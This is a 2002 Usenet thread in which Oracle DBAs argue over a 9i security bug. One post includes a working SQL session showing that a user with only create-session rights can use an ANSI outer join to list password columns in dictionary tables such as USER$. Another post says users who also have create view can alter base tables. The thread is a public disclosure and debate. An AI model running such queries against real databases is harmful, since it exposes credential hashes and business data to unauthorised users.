Re: Oracle 9i DB Security Hole

Many users will not have 'create view' rights meaning the creating of an updatable view is not available to them. so the ability to modify data will be absent in many cases. however this is cold comfort.

SQL> grant create session to niall identified by password;

Grant succeeded.

SQL> conn niall/password
Connected.
SQL> select distinct a.table_name,a.column_name   2 from dba_tab_columns a
  3 left outer join dba_tab_columns b
  4 on
  5 a.table_name=b.table_name
  6 and a.owner=b.owner
  7 where a.column_name like '%PASSWORD%';

TABLE_NAME                     COLUMN_NAME
------------------------------ --------------------
DBA_ROLES                      PASSWORD_REQUIRED
DBA_USERS                      PASSWORD
EXU7ROL                        PASSWORD
EXU8PHS                        PASSWORD
EXU8PHS                        PASSWORD_DATE
EXU8ROL                        PASSWORD
LINK$                          PASSWORD
USER$                          PASSWORD
USER_DB_LINKS                  PASSWORD
USER_HISTORY$                  PASSWORD
USER_HISTORY$                  PASSWORD_DATE

11 rows selected.

So a user with only Create Session privilege can read any data they like. In other words business data is entirely open to scrutiny by any user with create session privilege only.

--
Niall Litchfield
Oracle DBA
Audit Commission UK
*****************************************
Please include version and platform
and SQL where applicable
It makes life easier and increases the
likelihood of a good answer

******************************************

"Paul Vallee" <vallee+spam_at_pythian.com> wrote in message
news:bMlv8.17138$f5.1158259_at_news...


> Give me a break, Sybrand. This is not a *very specific* circumstance. We

> could all chase our salesreps, for all the good it would do! :-)

>

> So I'll make the assertion too: There is no security in 9i, at least not

in


> any versions available to the public right now. Proof?

>

> Any user granted create session and create view can:

>

> 1) select any table in the database

> 2) insert into any table in the database

> 3) update any table in the database

> 4) delete from any table in the database.

>

> INCLUDING BASE TABLES. Easily trashing any oracle database... "Can't break

> it." uhhh, ya, we can.

>

> You would think there is still some security... that user couldn't easily

> create a trigger or a procedure, for example. Who cares? That user could

> insert the rows in the base tables granting themselves anything, if they

> knew how... it can't be that hard can it?

>

> Refer to Howard Rogers' post:

> http://groups.google.ca/groups?hl=en&selm=3CBBC7ED.5CC5241B%40oracle.com

>

> Notice how he deletes every row from sys.obj$ (!!!) with nothing except

> create session and create view.

>

> I'm sure Oracle will be providing an emergency fix shortly now that the

> extent of the problem is public, and they know of course that if the media

> picks up on this before the bugfix is available, it will cause widespread

> panic and confusion. :-)

>

> Cheers,

> Paul

> ---

> www.pythian.com -- vallee_at_pythian.com -- 877-PYTHIAN

> Smarter than adding another team member, Pythian has new services for

> supplementing DBAs: get our help with monitoring, 24x7 on-call, daily

> verifications, storage management, performance and more.

>

>

> "Sybrand Bakker" <postbus_at_sybrandb.demon.nl> wrote in message

> news:ubrm2s28t2ud70_at_corp.supernews.com...

> > Yeah I know.

> > But that is in a *very specific* circumstance

> > and for the OP it results in the bold assertion

> > there is 'no security in Oracle 9i'

> > Do you think that is true?

> > Then start chasing your salesrep immediately.

> >

> > Regards

> >

> >

> > --

> > Sybrand Bakker

> > Senior Oracle DBA

> >

> > to reply remove '-verwijderdit' from my e-mail address

> >

> >

> > "TurkBear" <jgreco1_at_mn.rr.com> wrote in message

> > news:mvbrbukv3lup4lan2i2frtea6gk5llls4m_at_4ax.com...

> > >

> > > Sybrand,

> > > As you often recommend, a search of Google for Security and 9i on the

> > Oracle groups will show a reported bug that can, in

> > > some circumstances, allow users access to tables for which no

privileges


> > have been granted( in fact to any table)

> > >  ...IIRC,it involves use of the new ANSI compliant join syntax...

> > > At this time there are 33 threads about this issue..

> > >

> > >

> > >

> > >

> > > Sybrand Bakker <postbus_at_sybrandb.demon.nl> wrote:

> > >

> > > >On 17 Apr 2002 09:37:18 -0700, mfowler_at_dot.co.pima.az.us (m. fowler)

> > > >wrote:

> > > >

> > > >>I think the 'bug' can be summarized thus:  any user has read/write

> > > >>access to the data dictionary and any other user data.  This can be

> > > >>rephrased like this: there is no security within the 9.0.1 database.

> > > >>The implications of this would seem to be rather profound.

> > > >

> > > >

> > > >any user has read/write

> > > >access to the data dictionary

> > > >

> > > >So what? Do you know of any other mechanism in Oracle to update the

> > > >dictionary for you?

> > > >

> > > >

> > > >and any other user data ....

> > > >there is no security within the 9.0.1 database.

> > > >

> > > >Could you please provide at least *some* proof? Obviously you can't.

> > > >

> > > >And if you can demonstrate this, why don't you get in touch with

> > > >Oracle on this issue? Or do you prefer to flame Oracle in public?

That


> > > >would make you a coward, don't you think?

> > > >Or do you just like to be sued by Oracle for spreading such slander?

> > >

> > >

> > >

> > > -----=  Posted via Newsfeeds.Com, Uncensored Usenet News  =-----

> > > http://www.newsfeeds.com - The #1 Newsgroup Service in the World!

> > >  Check out our new Unlimited Server. No Download or Time Limits!

> > > -----==  Over 80,000 Newsgroups - 19 Different Servers!  ==-----

> >

> >

>

>